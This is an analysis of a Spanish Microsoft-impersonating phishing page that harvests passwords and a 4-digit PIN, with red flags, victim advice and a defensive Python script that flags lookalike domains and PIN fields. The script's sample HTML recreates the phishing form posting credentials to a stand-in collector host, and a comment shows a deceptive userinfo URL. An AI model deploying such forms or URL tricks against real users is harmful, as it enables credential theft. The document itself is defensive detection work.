
This screenshot shows a Spanish‑language phishing page impersonating Microsoft, asking for an unusual combination of credentials: email/phone/Skype, password, and a 4‑digit PIN.
Threat Analysis: Microsoft Phishing – Credential & PIN Harvesting
The page mimics Microsoft’s login interface but adds a 4‑digit PIN field, which is not part of Microsoft's web sign‑in at all (the Windows Hello PIN is local to the device and is never entered on a web page). The extra field is most likely there to capture a PIN the victim uses elsewhere, such as a SIM PIN, a bank card PIN, or a secondary security code, which is worth more to the attacker than a second Microsoft credential.
How it works:
The victim receives a phishing email or message claiming a security alert or account issue and is told to sign in through the supplied link, which leads to this page. After the victim enters the email, password, and 4‑digit PIN, the form submits the values to an attacker‑controlled endpoint; pages of this kind typically then redirect to the real Microsoft site so that nothing looks wrong to the victim.
The goal:
- Steal Microsoft account credentials (email and password) to access email and linked services
- Capture a 4‑digit PIN that the victim may reuse for banking, phone, or other sensitive accounts
Red flags:
- Suspicious URL: the page is hosted on a domain that is not microsoft.com or outlook.com (nor any other genuine Microsoft sign‑in domain such as live.com or microsoftonline.com). Judge the registrable domain at the end of the hostname, not whether "microsoft" appears somewhere in it: a host like login.microsoft.com.example.net belongs to example.net.
- Extra PIN field: a legitimate Microsoft login does not ask for a 4‑digit PIN at this stage, or at any stage of the web sign‑in.
- Everything on one form: the genuine Microsoft sign‑in asks for the email, phone, or Skype name first and for the password on a separate step that repeats the address you entered. A single form that collects email, password, and PIN together does not match that flow. (Microsoft does not use a security image or phrase, so its absence is not the tell; the single‑step form and the extra field are.)
- Unsolicited login request: a message saying your account is locked or flagged and that you must sign in through its link to fix it is the classic lure. Any genuine account notice can be reviewed by signing in at account.microsoft.com typed into the address bar, so the embedded link never needs to be used.
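The following Python script is an added example, not code from the original page: it mechanises the first two red flags (is the hostname really a Microsoft sign‑in domain, and does the form ask for a PIN next to the password?) so that a suspected page can be triaged from its URL and HTML. The allowlist of Microsoft sign‑in domains, the regular expression for PIN‑like field names, the example.net/example.org hostnames and the sample HTML are assumptions constructed for illustration, modelled on the Spanish form in the screenshot.

```python
"""Heuristic checks for a suspected Microsoft-branded phishing page.
Added example, not the original page's code."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption: a defender-maintained allowlist of registrable domains that host
# genuine Microsoft account sign-in pages (illustrative, not complete).
LEGIT_LOGIN_DOMAINS = {"microsoft.com", "live.com", "microsoftonline.com", "outlook.com"}

# Field names/placeholders that suggest a PIN or one-time code (English and
# Spanish, since the observed page is in Spanish). Assumed heuristic.
PIN_RE = re.compile(r"\b(pin|otp|codigo|código)\b")


def registrable_domain(host):
    """Last two DNS labels. Simplification: multi-label public suffixes such as
    co.uk are not handled; use a public-suffix-list library in production."""
    return ".".join(host.rstrip(".").split(".")[-2:])


def check_url(url):
    """Return the reasons this URL is not a genuine Microsoft sign-in URL.
    An empty list means the host passed the allowlist."""
    findings = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()  # .hostname strips user:pass@ and :port
    if parts.scheme != "https":
        findings.append(f"scheme is {parts.scheme!r}, not https")
    if not host:
        findings.append("no host in URL")
        return findings
    if parts.username is not None:
        # https://microsoft.com@evil.example/ shows 'microsoft.com' first but
        # actually connects to evil.example
        findings.append(f"userinfo {parts.username!r}@ placed before the real host {host}")
    try:
        ipaddress.ip_address(host)
        findings.append(f"host is a bare IP address {host}")
        return findings
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        findings.append(f"punycode label in host {host} (possible homoglyph domain)")
    domain = registrable_domain(host)
    if domain not in LEGIT_LOGIN_DOMAINS:
        # brand words buried in a lookalike hostname, e.g. login.microsoft.com.example.net
        decoys = sorted({d.split(".")[0] for d in LEGIT_LOGIN_DOMAINS if d.split(".")[0] in host})
        note = f"; brand word(s) {decoys} used as decoy labels" if decoys else ""
        findings.append(f"host {host} is not a Microsoft login domain "
                        f"(registrable domain is {domain}){note}")
    return findings


class FormScanner(HTMLParser):
    """Collect <form action> targets and <input> attributes from page HTML."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "").lower() for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input":
            self.inputs.append(a)


def analyse_form(html, page_url):
    """Flag a PIN-style field next to a password field, and a form that posts
    to a host other than the page's own (credentials going to a collector)."""
    scanner = FormScanner()
    scanner.feed(html)
    findings = []
    has_password = any(i.get("type") == "password" for i in scanner.inputs)
    pin_fields = [
        i for i in scanner.inputs
        if PIN_RE.search(" ".join(i.get(k, "") for k in ("name", "id", "placeholder")))
        or (i.get("maxlength") == "4" and i.get("type") in {"password", "tel", "number"})
    ]
    if has_password and pin_fields:
        names = [i.get("name") or i.get("id") or "?" for i in pin_fields]
        findings.append(f"password field plus PIN-style field(s) {names} on one form")
    page_host = (urlsplit(page_url).hostname or "").lower()
    for action in scanner.actions:
        target = (urlsplit(urljoin(page_url, action)).hostname or "").lower()
        if target != page_host:
            findings.append(f"form posts to {target}, not to the page host {page_host}")
    return findings


# Constructed sample modelled on the screenshot: Spanish Microsoft-style form
# with an extra 4-digit PIN, on a lookalike domain, posting off-site.
SAMPLE_URL = "https://login.microsoft.com.verificacion.example.net/es/inicio"
SAMPLE_HTML = """
<form method="post" action="https://collector.example.org/post.php">
  <input type="email" name="loginfmt" placeholder="Correo electrónico, teléfono o Skype">
  <input type="password" name="passwd" placeholder="Contraseña">
  <input type="password" name="pin" maxlength="4" inputmode="numeric" placeholder="PIN de 4 dígitos">
  <input type="submit" value="Iniciar sesión">
</form>
"""

if __name__ == "__main__":
    for f in check_url(SAMPLE_URL) + analyse_form(SAMPLE_HTML, SAMPLE_URL):
        print("FLAG:", f)
    print("legit:", check_url("https://login.live.com/login.srf"))
```

The URL check deliberately uses the registrable domain rather than substring matching, so a hostname that merely contains "microsoft" is reported as a decoy rather than accepted; the userinfo and bare‑IP cases cover two other ways a link can be made to look like Microsoft's. The form check is a heuristic for triage, not a verdict: a genuine page can legitimately post to another host of its own organisation, so treat the output as reasons to look closer.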
What to do:
- Do not enter any credentials or PIN.
- If you have already submitted information, change your Microsoft password immediately, review the account's recent sign‑in activity, and enable two‑factor authentication. If the PIN you entered is one you use elsewhere (e.g., a bank card or phone SIM), contact the relevant institution and change it there as well.
- Always reach Microsoft services by typing outlook.com or microsoft.com into the address bar yourself rather than following a link.
Protective measures:
- Bookmark the official Microsoft login page and use it exclusively.
- Use a password manager: it only offers saved credentials on the exact domain they were saved for, so it stays silent on a lookalike site, which is itself a warning sign.
- Never reuse PINs across different services.
- Enable two‑factor authentication on your Microsoft account, preferably with an authenticator app or a passkey rather than SMS codes.
